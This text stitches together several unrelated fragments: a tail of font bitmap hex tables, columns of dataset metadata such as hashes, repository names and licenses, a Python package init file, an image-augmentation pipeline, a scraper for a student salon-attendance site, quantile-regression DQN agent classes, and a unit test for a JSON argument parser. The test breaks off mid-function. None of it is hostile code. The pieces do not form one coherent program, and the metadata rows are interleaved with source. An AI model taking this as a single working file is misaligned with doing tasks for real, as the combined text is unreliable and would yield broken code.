[0x7f, 0x2, 0xc, 0x2, 0x7f],
[0x7f, 0x4, 0x8, 0x10, 0x7f],
[0x3e, 0x41, 0x41, 0x41, 0x3e],
[0x7f, 0x9, 0x9, 0x9, 0x6],
[0x3e, 0x41, 0x51, 0x21, 0x5e],
[0x7f, 0x9, 0x19, 0x29, 0x46],
[0x46, 0x49, 0x49, 0x49, 0x31],
[0x1, 0x1, 0x7f, 0x1, 0x1],
[0x3f, 0x40, 0x40, 0x40, 0x3f],
[0x1f, 0x20, 0x40, 0x20, 0x1f],
[0x3f, 0x40, 0x38, 0x40, 0x3f],
[0x63, 0x14, 0x8, 0x14, 0x63],
[0x7, 0x8, 0x70, 0x8, 0x7],
[0x61, 0x51, 0x49, 0x45, 0x43]]
sevenByNine = [[7, 9, 2, 8, 0],
[0xfe, 0xff, 0x21, 0x11, 0x9, 0xff, 0xfe, 0x0, 0x1, 0x1, 0x1, 0x1, 0x1, 0x0],
[0x0, 0x4, 0xff, 0xff, 0x0, 0x0, 0x0, 0x1, 0x1, 0x1, 0x1, 0x1, 0x1, 0x0],
[0x2, 0x83, 0xc1, 0x61, 0x31, 0x1f, 0xe, 0x1, 0x1, 0x1, 0x1, 0x1, 0x1, 0x1],
[0x82, 0x83, 0x1, 0x11, 0x11, 0xff, 0xee, 0x0, 0x1, 0x1, 0x1, 0x1, 0x1, 0x0],
[0x30, 0x38, 0x2c, 0x26, 0xff, 0xff, 0x20, 0x0, 0x0, 0x0, 0x0, 0x1, 0x1, 0x0],
[0x8f, 0x8f, 0x9, 0x9, 0x9, 0xf9, 0xf1, 0x0, 0x1, 0x1, 0x1, 0x1, 0x1, 0x0],
[0xfe, 0xff, 0x9, 0x9, 0x9, 0xfb, 0xf2, 0x0, 0x1, 0x1, 0x1, 0x1, 0x1, 0x0],
[0x1, 0xe1, 0xf1, 0x19, 0xd, 0x7, 0x3, 0x0, 0x1, 0x1, 0x0, 0x0, 0x0, 0x0],
[0xee, 0xff, 0x11, 0x11, 0x11, 0xff, 0xee, 0x0, 0x1, 0x1, 0x1, 0x1, 0x1, 0x0],
[0x9e, 0xbf, 0x21, 0x21, 0x21, 0xff, 0xfe, 0x0, 0x1, 0x1, 0x1, 0x1, 0x1, 0x0]]
| 86.842553
| 114
| 0.503381
| 2,936
| 20,408
| 3.498978
| 0.043937
| 0.396574
| 0.500243
| 0.560693
| 0.886401
| 0.877251
| 0.859048
| 0.85496
| 0.833739
| 0.802492
| 0
| 0.432622
| 0.343297
| 20,408
| 234
| 115
| 87.213675
| 0.333905
| 0.003234
| 0
| 0.350877
| 0
| 0
| 0
| 0
| 0
| 0
| 0.502885
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 12
|
928dce585914fd91a7df511966e94543097b1404
| 148
|
py
|
Python
|
src/__init__.py
|
kei1107/G-calendar
|
7e67b62a3313e96f227b2145e982e21bd9f1a90d
|
[
"MIT"
] | null | null | null |
src/__init__.py
|
kei1107/G-calendar
|
7e67b62a3313e96f227b2145e982e21bd9f1a90d
|
[
"MIT"
] | null | null | null |
src/__init__.py
|
kei1107/G-calendar
|
7e67b62a3313e96f227b2145e982e21bd9f1a90d
|
[
"MIT"
] | null | null | null |
from . import Setup_Logger
from . import Setup_Config
from . import Get_Credentials
from . import AccessGymReservationSystem
from . import CreateApi
| 29.6
| 40
| 0.837838
| 18
| 148
| 6.722222
| 0.5
| 0.413223
| 0.247934
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.128378
| 148
| 5
| 41
| 29.6
| 0.937985
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
2b7f96d855f9bbfceeea4981b541f3f33d709e0e
| 7,585
|
py
|
Python
|
src/data/transform.py
|
DIAGNijmegen/pathology-artifact-detection
|
ec614ad74ae161e839fe24ccb23fe98fcbb27cde
|
[
"Apache-2.0"
] | 6
|
2021-05-26T08:22:42.000Z
|
2022-03-07T09:45:30.000Z
|
src/data/transform.py
|
DIAGNijmegen/pathology-artifact-detection
|
ec614ad74ae161e839fe24ccb23fe98fcbb27cde
|
[
"Apache-2.0"
] | 1
|
2021-10-05T06:32:55.000Z
|
2021-10-05T06:32:55.000Z
|
src/data/transform.py
|
DIAGNijmegen/pathology-artifact-detection
|
ec614ad74ae161e839fe24ccb23fe98fcbb27cde
|
[
"Apache-2.0"
] | 1
|
2021-09-13T20:24:18.000Z
|
2021-09-13T20:24:18.000Z
|
import numpy as np
import albumentations as A
def load_train_transform(transform_type, patch_size=512):
if transform_type == 'basic':
transform = A.Compose([
A.RandomRotate90(p=0.75),
A.HorizontalFlip(p=0.5),
A.VerticalFlip(p=0.5),
A.PadIfNeeded(patch_size, patch_size)])
elif transform_type == 'light':
transform = A.Compose([
# rotate image
A.RandomRotate90(p=0.75),
A.HorizontalFlip(p=0.5),
A.VerticalFlip(p=0.5),
A.Rotate(limit=90, interpolation=2, border_mode=0, value=0, mask_value=0, p=0.25),
# apply random resized crop
A.RandomSizedCrop(min_max_height=(256, 768), height=patch_size, width=patch_size, interpolation=2, p=1.0),
A.PadIfNeeded(patch_size, patch_size),
A.HueSaturationValue(
hue_shift_limit=10,
sat_shift_limit=10,
val_shift_limit=0,
p=0.5),
A.OneOf([
A.RandomBrightnessContrast(brightness_limit=0.15, contrast_limit=0.0, p=1.0),
A.RandomBrightnessContrast(brightness_limit=0.0, contrast_limit=0.15, p=1.0),
A.RandomGamma(p=.0)], p=1.0),
A.PadIfNeeded(patch_size, patch_size)])
elif transform_type == 'medium':
transform = A.Compose([
# rotate image
A.RandomRotate90(p=0.75),
A.HorizontalFlip(p=0.5),
A.VerticalFlip(p=0.5),
A.Rotate(limit=90, interpolation=2, border_mode=0, value=0, mask_value=0, p=0.25),
# apply random resized crop
A.RandomSizedCrop(min_max_height=(256, 768), height=patch_size, width=patch_size, interpolation=2, p=1.0),
A.PadIfNeeded(patch_size, patch_size),
A.transforms.ColorJitter(brightness=0.2, contrast=0.2, saturation=0.2, hue=0.2, p=0.1),
A.CoarseDropout(max_holes=12, max_height=12, max_width=12, fill_value=0, p=0.25),
A.RandomResizedCrop(patch_size, patch_size, scale=(0.5, 1.5), ratio=(0.5, 1.5), interpolation=1, p=0.5),
A.RGBShift(r_shift_limit=20, g_shift_limit=20, b_shift_limit=20, p=0.5),
A.HueSaturationValue(
hue_shift_limit=20,
sat_shift_limit=20,
val_shift_limit=5,
p=0.5),
A.OneOf([
A.RandomBrightnessContrast(brightness_limit=0.4, contrast_limit=0.0, p=0.75),
A.RandomBrightnessContrast(brightness_limit=0.0, contrast_limit=0.2, p=0.75),
A.RandomGamma(gamma_limit=(75, 125), p=0.5)], p=1.0),
A.OneOf([
A.CLAHE(clip_limit=2.0, tile_grid_size=(8, 8), p=0.75),
A.IAASharpen(alpha=(0.2, 0.5), lightness=(0.5, 1.0), p=0.75),
A.ImageCompression(quality_lower=60, quality_upper=100, compression_type=0, p=0.75)], p=1.0),
])
elif transform_type == 'moderate':
transform = A.Compose([
# rotate image
A.RandomRotate90(p=0.75),
A.HorizontalFlip(p=0.5),
A.VerticalFlip(p=0.5),
A.Rotate(limit=90, interpolation=2, border_mode=0, value=0, mask_value=0, p=0.25),
# apply random resized crop
A.RandomSizedCrop(min_max_height=(256, 768), height=patch_size, width=patch_size, interpolation=2, p=1.0),
A.PadIfNeeded(patch_size, patch_size),
A.OneOf([
A.transforms.ColorJitter(brightness=0.2, contrast=0.2, saturation=0.2, hue=0.2, p=1.0),
A.CoarseDropout(max_holes=8, max_height=20, max_width=20, fill_value=0, p=1.0)], p=0.25),
A.OneOf([
A.RGBShift(
r_shift_limit=20,
g_shift_limit=20,
b_shift_limit=20,
p=1.0),
A.HueSaturationValue(
hue_shift_limit=20,
sat_shift_limit=20,
val_shift_limit=10,
p=1.0)], p=0.5),
A.OneOf([
A.RandomBrightnessContrast(brightness_limit=0.2, contrast_limit=0.0, p=1.0),
A.RandomBrightnessContrast(brightness_limit=0.0, contrast_limit=0.2, p=1.0),
A.RandomGamma(p=.0)], p=0.5),
A.OneOf([
A.ElasticTransform(
alpha=200,
sigma=20,
alpha_affine=20,
interpolation=1,
border_mode=0,
value=0,
mask_value=0,
p=1.0),
A.GridDistortion(
num_steps=10,
distort_limit=0.3,
interpolation=1,
border_mode=0,
value=0,
mask_value=0,
p=1.0)], p=0.5),
A.OneOf([
A.CLAHE(clip_limit=2.0, tile_grid_size=(8, 8), p=1.0),
A.IAASharpen(alpha=(0.2, 0.5), lightness=(0.5, 1.0), p=1.0),
A.ImageCompression(quality_lower=60, quality_upper=100, compression_type=0, p=1.0)], p=0.5),
])
elif transform_type == 'artifact':
transform = A.Compose([
# rotate image
A.RandomRotate90(p=0.75),
A.HorizontalFlip(p=0.5),
A.VerticalFlip(p=0.5),
A.Rotate(limit=90, interpolation=2, border_mode=0, value=0, mask_value=0, p=0.25),
A.OneOf([
A.transforms.ColorJitter(brightness=0.2, contrast=0.2, saturation=0.2, hue=0.2, p=1.0),
A.CoarseDropout(max_holes=8, max_height=20, max_width=20, fill_value=0, p=1.0)], p=0.25),
A.OneOf([
A.RGBShift(
r_shift_limit=20,
g_shift_limit=20,
b_shift_limit=20,
p=1.0),
A.HueSaturationValue(
hue_shift_limit=20,
sat_shift_limit=20,
val_shift_limit=10,
p=1.0)], p=0.5),
A.OneOf([
A.RandomBrightnessContrast(brightness_limit=0.2, contrast_limit=0.0, p=1.0),
A.RandomBrightnessContrast(brightness_limit=0.0, contrast_limit=0.2, p=1.0),
A.RandomGamma(p=.0)], p=0.5),
A.OneOf([
A.ElasticTransform(
alpha=200,
sigma=20,
alpha_affine=20,
interpolation=1,
border_mode=0,
value=0,
mask_value=0,
p=1.0),
A.GridDistortion(
num_steps=10,
distort_limit=0.3,
interpolation=1,
border_mode=0,
value=0,
mask_value=0,
p=1.0)], p=0.5),
A.OneOf([
A.CLAHE(clip_limit=2.0, tile_grid_size=(8, 8), p=1.0),
A.IAASharpen(alpha=(0.2, 0.5), lightness=(0.5, 1.0), p=1.0),
A.ImageCompression(quality_lower=60, quality_upper=100, compression_type=0, p=1.0)], p=0.5),
A.PadIfNeeded(patch_size, patch_size)
])
else:
transform = A.Compose([A.PadIfNeeded(patch_size, patch_size)])
return transform
def load_valid_transform(patch_size=768):
return A.Compose([A.PadIfNeeded(patch_size, patch_size)])
| 39.097938
| 118
| 0.51325
| 985
| 7,585
| 3.796954
| 0.111675
| 0.023529
| 0.024064
| 0.02246
| 0.878877
| 0.864706
| 0.861765
| 0.861765
| 0.836898
| 0.803209
| 0
| 0.091619
| 0.358207
| 7,585
| 193
| 119
| 39.300518
| 0.676664
| 0.017007
| 0
| 0.8
| 0
| 0
| 0.004296
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.012903
| false
| 0
| 0.012903
| 0.006452
| 0.03871
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2ba11a900136c4231565c77b4e5aaa43c8bca533
| 1,604
|
py
|
Python
|
getZyIns.py
|
walotta/wBot
|
2bdab2d308b0d7599cf4b788b2839680795d19d7
|
[
"MIT"
] | null | null | null |
getZyIns.py
|
walotta/wBot
|
2bdab2d308b0d7599cf4b788b2839680795d19d7
|
[
"MIT"
] | null | null | null |
getZyIns.py
|
walotta/wBot
|
2bdab2d308b0d7599cf4b788b2839680795d19d7
|
[
"MIT"
] | null | null | null |
import requests
from bs4 import BeautifulSoup
import re
# ret: [学生学号], [参加总次数], [沙龙次数], [院系讲座次数]
def getInfo(studentId):
try:
url='https://zysalon.com/result?id={}'.format(studentId)
html=requests.get(url)
soup=BeautifulSoup(html.text,'html.parser')
msg=[]
id=0
for child in soup.p.children:
if id==0 or id==2:
msg.append(str(child))
id+=1
info=[]
for m in msg:
for num in re.findall(r"\d+\.?\d*",m):
info.append(num)
info=[int(i) for i in info]
if str(info[0])!=str(studentId):
return 0,'url student number not fit'
else:
return 1,info
except:
return 0,'error occur'
def getDetail(studentId):
try:
url='https://zysalon.com/result?id={}'.format(studentId)
html=requests.get(url)
soup=BeautifulSoup(html.text,'html.parser')
msg=[]
detail=[]
id=0
for child in soup.p.children:
if id==0 or id==2:
msg.append(str(child))
id+=1
id=0
for child in soup.ul.children:
if id%2==1:
detail.append(str(child)[4:-5])
id+=1
info=[]
for m in msg:
for num in re.findall(r"\d+\.?\d*",m):
info.append(num)
info=[int(i) for i in info]
if str(info[0])!=str(studentId):
return 0,'url student number not fit'
else:
return 1,info,detail
except:
return 0,'error occur'
| 27.186441
| 64
| 0.498753
| 213
| 1,604
| 3.755869
| 0.29108
| 0.01875
| 0.0225
| 0.04125
| 0.8225
| 0.765
| 0.74375
| 0.74375
| 0.74375
| 0.74375
| 0
| 0.022461
| 0.361596
| 1,604
| 58
| 65
| 27.655172
| 0.758789
| 0.023691
| 0
| 0.792453
| 0
| 0
| 0.113811
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.037736
| false
| 0
| 0.056604
| 0
| 0.207547
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2bbb3c16999f654909e09e3793e703933d97c281
| 15,168
|
py
|
Python
|
deep_rl/agent/others/QuantileRegressionDQN_agent.py
|
DMIU-ShELL/deeprl-shell
|
a7845ab1c4967ba2af9486625086c3d0b176d293
|
[
"Apache-2.0"
] | null | null | null |
deep_rl/agent/others/QuantileRegressionDQN_agent.py
|
DMIU-ShELL/deeprl-shell
|
a7845ab1c4967ba2af9486625086c3d0b176d293
|
[
"Apache-2.0"
] | null | null | null |
deep_rl/agent/others/QuantileRegressionDQN_agent.py
|
DMIU-ShELL/deeprl-shell
|
a7845ab1c4967ba2af9486625086c3d0b176d293
|
[
"Apache-2.0"
] | null | null | null |
#######################################################################
# Copyright (C) 2017 Shangtong Zhang(zhangshangtong.cpp@gmail.com) #
# Permission given to modify the code as long as you keep this #
# declaration at the top #
#######################################################################
from ...network import *
from ...component import *
from ...utils import *
import time
from ..BaseAgent import *
class QuantileRegressionDQNAgent_mod(BaseAgent):
def __init__(self, config):
BaseAgent.__init__(self, config)
self.config = config
self.task = config.task_fn()
self.network = config.network_fn(self.task.state_dim, self.task.action_dim)
self.target_network = config.network_fn(self.task.state_dim, self.task.action_dim)
self.optimizer = config.optimizer_fn(self.network.parameters())
self.criterion = nn.MSELoss()
self.target_network.load_state_dict(self.network.state_dict())
self.replay = config.replay_fn()
self.policy = config.policy_fn()
self.total_steps = 0
self.quantile_weight = 1.0 / self.config.num_quantiles
self.cumulative_density = tensor(
(2 * np.arange(self.config.num_quantiles) + 1) / (2.0 * self.config.num_quantiles))
self.mem_update_rate = 0.1;
def huber(self, x):
cond = (x.abs() < 1.0).float().detach()
return 0.5 * x.pow(2) * cond + (x.abs() - 0.5) * (1 - cond)
def evaluation_action(self, state, x_mem):
value = self.network.predict(np.stack([self.config.state_normalizer(state)]), np.stack([self.config.state_normalizer(x_mem)])).squeeze(0).detach()
value = (value * self.quantile_weight).sum(-1).cpu().detach().numpy().flatten()
return np.argmax(value)
def episode(self, deterministic=False):
episode_start_time = time.time()
state = self.task.reset()
memory = np.asarray(state)
total_reward = 0.0
steps = 0
while True:
# memory = np.asarray((1-self.mem_update_rate)*memory+self.mem_update_rate*np.asarray(state))
memory = (np.multiply(1-self.mem_update_rate,memory)+np.multiply(self.mem_update_rate,np.asarray(state))).astype(np.uint8)
value = self.network.predict(np.stack([self.config.state_normalizer(state)]),np.stack([self.config.state_normalizer(memory)])).squeeze(0).detach()
value = (value * self.quantile_weight).sum(-1).cpu().detach().numpy().flatten()
if deterministic:
action = np.argmax(value)
elif self.total_steps < self.config.exploration_steps:
action = np.random.randint(0, len(value))
else:
action = self.policy.sample(value)
next_state, reward, done, _ = self.task.step(action)
total_reward += reward
reward = self.config.reward_normalizer(reward)
if not deterministic:
self.replay.feed([state, memory, action, reward, next_state, int(done)])
self.total_steps += 1
steps += 1
state = next_state
if not deterministic and self.total_steps > self.config.exploration_steps \
and self.total_steps % self.config.sgd_update_frequency == 0:
experiences = self.replay.sample()
states, memories, actions, rewards, next_states, terminals = experiences
states = self.config.state_normalizer(states)
next_states = self.config.state_normalizer(next_states)
memories = self.config.state_normalizer(memories)
quantiles_next = self.target_network.predict(next_states,memories).detach()
q_next = (quantiles_next * self.quantile_weight).sum(-1)
_, a_next = torch.max(q_next, dim=1)
a_next = a_next.view(-1, 1, 1).expand(-1, -1, quantiles_next.size(2))
quantiles_next = quantiles_next.gather(1, a_next).squeeze(1)
rewards = tensor(rewards)
terminals = tensor(terminals)
quantiles_next = rewards.view(-1, 1) + self.config.discount * (1 - terminals.view(-1, 1)) * quantiles_next
quantiles = self.network.predict(states,memories)
actions = tensor(actions).long()
actions = actions.view(-1, 1, 1).expand(-1, -1, quantiles.size(2))
quantiles = quantiles.gather(1, actions).squeeze(1)
quantiles_next = quantiles_next.t().unsqueeze(-1)
diff = quantiles_next - quantiles
loss = self.huber(diff) * (self.cumulative_density.view(1, -1) - (diff.detach() < 0).float()).abs()
self.optimizer.zero_grad()
loss.mean(0).mean(1).sum().backward()
self.optimizer.step()
self.evaluate()
if not deterministic and self.total_steps % self.config.target_network_update_freq == 0:
self.target_network.load_state_dict(self.network.state_dict())
if not deterministic and self.total_steps > self.config.exploration_steps:
self.policy.update_epsilon()
if done:
break
episode_time = time.time() - episode_start_time
self.config.logger.debug('episode steps %d, episode time %f, time per step %f' %
(steps, episode_time, episode_time / float(steps)))
return total_reward, steps
class QuantileRegressionDQNAgent_mod_surp(BaseAgent):
def __init__(self, config):
BaseAgent.__init__(self, config)
self.config = config
self.task = config.task_fn()
self.network = config.network_fn(self.task.state_dim, self.task.action_dim)
self.target_network = config.network_fn(self.task.state_dim, self.task.action_dim)
self.optimizer = config.optimizer_fn(self.network.parameters())
self.criterion = nn.MSELoss()
self.target_network.load_state_dict(self.network.state_dict())
self.replay = config.replay_fn()
self.policy = config.policy_fn()
self.total_steps = 0
self.quantile_weight = 1.0 / self.config.num_quantiles
self.cumulative_density = tensor(
(2 * np.arange(self.config.num_quantiles) + 1) / (2.0 * self.config.num_quantiles))
self.mem_update_rate = 0.1;
def huber(self, x):
cond = (x.abs() < 1.0).float().detach()
return 0.5 * x.pow(2) * cond + (x.abs() - 0.5) * (1 - cond)
def evaluation_action(self, state, x_mem):
value = self.network.predict(np.stack([self.config.state_normalizer(state)]), np.stack([self.config.state_normalizer(x_mem)])).squeeze(0).detach()
value = (value * self.quantile_weight).sum(-1).cpu().detach().numpy().flatten()
return np.argmax(value)
def episode(self, deterministic=False):
episode_start_time = time.time()
state = self.task.reset()
memory = np.asarray(state)
total_reward = 0.0
steps = 0
while True:
memory = (np.multiply(1-self.mem_update_rate,memory)+np.multiply(self.mem_update_rate,np.asarray(state))).astype(np.uint8)
novel_x = state - memory
value = self.network.predict(np.stack([self.config.state_normalizer(state)]),np.stack([self.config.state_normalizer(novel_x)])).squeeze(0).detach()
value = (value * self.quantile_weight).sum(-1).cpu().detach().numpy().flatten()
if deterministic:
action = np.argmax(value)
elif self.total_steps < self.config.exploration_steps:
action = np.random.randint(0, len(value))
else:
action = self.policy.sample(value)
next_state, reward, done, _ = self.task.step(action)
total_reward += reward
reward = self.config.reward_normalizer(reward)
if not deterministic:
self.replay.feed([state, novel_x, action, reward, next_state, int(done)])
self.total_steps += 1
steps += 1
state = next_state
if not deterministic and self.total_steps > self.config.exploration_steps \
and self.total_steps % self.config.sgd_update_frequency == 0:
experiences = self.replay.sample()
states, novel_xs, actions, rewards, next_states, terminals = experiences
states = self.config.state_normalizer(states)
next_states = self.config.state_normalizer(next_states)
novel_xs = self.config.state_normalizer(novel_xs)
quantiles_next = self.target_network.predict(next_states,novel_xs).detach()
q_next = (quantiles_next * self.quantile_weight).sum(-1)
_, a_next = torch.max(q_next, dim=1)
a_next = a_next.view(-1, 1, 1).expand(-1, -1, quantiles_next.size(2))
quantiles_next = quantiles_next.gather(1, a_next).squeeze(1)
rewards = tensor(rewards)
terminals = tensor(terminals)
quantiles_next = rewards.view(-1, 1) + self.config.discount * (1 - terminals.view(-1, 1)) * quantiles_next
quantiles = self.network.predict(states,novel_xs)
actions = tensor(actions).long()
actions = actions.view(-1, 1, 1).expand(-1, -1, quantiles.size(2))
quantiles = quantiles.gather(1, actions).squeeze(1)
quantiles_next = quantiles_next.t().unsqueeze(-1)
diff = quantiles_next - quantiles
loss = self.huber(diff) * (self.cumulative_density.view(1, -1) - (diff.detach() < 0).float()).abs()
self.optimizer.zero_grad()
loss.mean(0).mean(1).sum().backward()
self.optimizer.step()
self.evaluate()
if not deterministic and self.total_steps % self.config.target_network_update_freq == 0:
self.target_network.load_state_dict(self.network.state_dict())
if not deterministic and self.total_steps > self.config.exploration_steps:
self.policy.update_epsilon()
if done:
break
episode_time = time.time() - episode_start_time
self.config.logger.debug('episode steps %d, episode time %f, time per step %f' %
(steps, episode_time, episode_time / float(steps)))
return total_reward, steps
class QuantileRegressionDQNAgent(BaseAgent):
def __init__(self, config):
BaseAgent.__init__(self, config)
self.config = config
self.task = config.task_fn()
self.network = config.network_fn(self.task.state_dim, self.task.action_dim)
self.target_network = config.network_fn(self.task.state_dim, self.task.action_dim)
self.optimizer = config.optimizer_fn(self.network.parameters())
self.criterion = nn.MSELoss()
self.target_network.load_state_dict(self.network.state_dict())
self.replay = config.replay_fn()
self.policy = config.policy_fn()
self.total_steps = 0
self.quantile_weight = 1.0 / self.config.num_quantiles
self.cumulative_density = tensor(
(2 * np.arange(self.config.num_quantiles) + 1) / (2.0 * self.config.num_quantiles))
def huber(self, x):
cond = (x.abs() < 1.0).float().detach()
return 0.5 * x.pow(2) * cond + (x.abs() - 0.5) * (1 - cond)
def evaluation_action(self, state):
value = self.network.predict(np.stack([self.config.state_normalizer(state)])).squeeze(0).detach()
value = (value * self.quantile_weight).sum(-1).cpu().detach().numpy().flatten()
return np.argmax(value)
def episode(self, deterministic=False):
episode_start_time = time.time()
state = self.task.reset()
total_reward = 0.0
steps = 0
while True:
value = self.network.predict(np.stack([self.config.state_normalizer(state)])).squeeze(0).detach()
value = (value * self.quantile_weight).sum(-1).cpu().detach().numpy().flatten()
if deterministic:
action = np.argmax(value)
elif self.total_steps < self.config.exploration_steps:
action = np.random.randint(0, len(value))
else:
action = self.policy.sample(value)
next_state, reward, done, _ = self.task.step(action)
total_reward += reward
reward = self.config.reward_normalizer(reward)
if not deterministic:
self.replay.feed([state, action, reward, next_state, int(done)])
self.total_steps += 1
steps += 1
state = next_state
if not deterministic and self.total_steps > self.config.exploration_steps \
and self.total_steps % self.config.sgd_update_frequency == 0:
experiences = self.replay.sample()
states, actions, rewards, next_states, terminals = experiences
states = self.config.state_normalizer(states)
next_states = self.config.state_normalizer(next_states)
quantiles_next = self.target_network.predict(next_states).detach()
q_next = (quantiles_next * self.quantile_weight).sum(-1)
_, a_next = torch.max(q_next, dim=1)
a_next = a_next.view(-1, 1, 1).expand(-1, -1, quantiles_next.size(2))
quantiles_next = quantiles_next.gather(1, a_next).squeeze(1)
rewards = tensor(rewards)
terminals = tensor(terminals)
quantiles_next = rewards.view(-1, 1) + self.config.discount * (1 - terminals.view(-1, 1)) * quantiles_next
quantiles = self.network.predict(states)
actions = tensor(actions).long()
actions = actions.view(-1, 1, 1).expand(-1, -1, quantiles.size(2))
quantiles = quantiles.gather(1, actions).squeeze(1)
quantiles_next = quantiles_next.t().unsqueeze(-1)
diff = quantiles_next - quantiles
loss = self.huber(diff) * (self.cumulative_density.view(1, -1) - (diff.detach() < 0).float()).abs()
self.optimizer.zero_grad()
loss.mean(0).mean(1).sum().backward()
self.optimizer.step()
self.evaluate()
if not deterministic and self.total_steps % self.config.target_network_update_freq == 0:
self.target_network.load_state_dict(self.network.state_dict())
if not deterministic and self.total_steps > self.config.exploration_steps:
self.policy.update_epsilon()
if done:
break
episode_time = time.time() - episode_start_time
self.config.logger.debug('episode steps %d, episode time %f, time per step %f' %
(steps, episode_time, episode_time / float(steps)))
return total_reward, steps
| 50.729097
| 159
| 0.600079
| 1,814
| 15,168
| 4.840132
| 0.084895
| 0.068337
| 0.033485
| 0.051253
| 0.95672
| 0.952733
| 0.95
| 0.946469
| 0.927221
| 0.927221
| 0
| 0.016361
| 0.270636
| 15,168
| 298
| 160
| 50.899329
| 0.777276
| 0.020372
| 0
| 0.897638
| 0
| 0
| 0.010402
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.047244
| false
| 0
| 0.019685
| 0
| 0.114173
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2bd7046e384423d88e4ca85153a3e4866f72996b
| 138
|
py
|
Python
|
jupyterlab_iframe/tests/test_all.py
|
djangoliv/jupyterlab_iframe
|
b78edc56c04caed9cbfd041d84cec8560ca324cc
|
[
"Apache-2.0"
] | 82
|
2018-03-14T09:48:39.000Z
|
2022-03-07T16:50:56.000Z
|
jupyterlab_iframe/tests/test_all.py
|
djangoliv/jupyterlab_iframe
|
b78edc56c04caed9cbfd041d84cec8560ca324cc
|
[
"Apache-2.0"
] | 94
|
2018-03-12T03:17:52.000Z
|
2022-03-20T17:36:50.000Z
|
jupyterlab_iframe/tests/test_all.py
|
djangoliv/jupyterlab_iframe
|
b78edc56c04caed9cbfd041d84cec8560ca324cc
|
[
"Apache-2.0"
] | 19
|
2018-04-10T02:09:07.000Z
|
2021-07-16T03:40:30.000Z
|
# for Coverage
from jupyterlab_iframe.__init__ import * # noqa: F401, F403
from jupyterlab_iframe.extension import * # noqa: F401, F403
| 34.5
| 61
| 0.768116
| 18
| 138
| 5.555556
| 0.611111
| 0.28
| 0.4
| 0.36
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.102564
| 0.152174
| 138
| 3
| 62
| 46
| 0.752137
| 0.333333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
a61a60a113b6c2a91580dceea77cb52814389840
| 1,794
|
py
|
Python
|
tests/test_utils_parse.py
|
DerThorsten/kipoi-utils
|
1fc373a1cbed4fa2151344bc3d34c59c9568e9af
|
[
"MIT"
] | null | null | null |
tests/test_utils_parse.py
|
DerThorsten/kipoi-utils
|
1fc373a1cbed4fa2151344bc3d34c59c9568e9af
|
[
"MIT"
] | 8
|
2019-07-13T16:04:30.000Z
|
2022-03-17T12:41:26.000Z
|
tests/test_utils_parse.py
|
DerThorsten/kipoi-utils
|
1fc373a1cbed4fa2151344bc3d34c59c9568e9af
|
[
"MIT"
] | 2
|
2019-09-27T15:43:52.000Z
|
2020-07-13T19:25:43.000Z
|
from kipoi_utils.utils import parse_json_file_str_or_arglist
import tempfile
def test_parse_json_file_str_or_arglist_from_json():
input_list = ["""{
"key_a":1.0,
"key_b":true,
"key_c":["hello", 42],
"key_d":"42"
}
"""]
res = parse_json_file_str_or_arglist(input_list)
assert 'key_a' in res
assert res['key_a'] == 1.0
assert 'key_b' in res
assert res['key_b'] == True
assert 'key_c' in res
assert res['key_c'] == ["hello", 42]
assert 'key_d' in res
assert res['key_d'] == "42"
assert len(res) == 4
def test_parse_json_file_str_or_arglist_from_arglist():
input_list = [
"key_a=1.0",
"key_b=True",
"""key_c=["hello",42]""",
"""key_d='42'"""
]
res = parse_json_file_str_or_arglist(input_list)
assert 'key_a' in res
assert res['key_a'] == 1.0
assert 'key_b' in res
assert res['key_b'] == True
assert 'key_c' in res
assert res['key_c'] == ["hello", 42]
assert 'key_d' in res
assert res['key_d'] == "42"
assert len(res) == 4
def test_parse_json_file_str_or_arglist_from_arglist():
json_str = """{
"key_a":1.0,
"key_b":true,
"key_c":["hello", 42],
"key_d":"42"
}
"""
import tempfile
tmp = tempfile.NamedTemporaryFile()
# Open the file for writing.
with open(tmp.name, 'w') as f:
f.write(json_str)
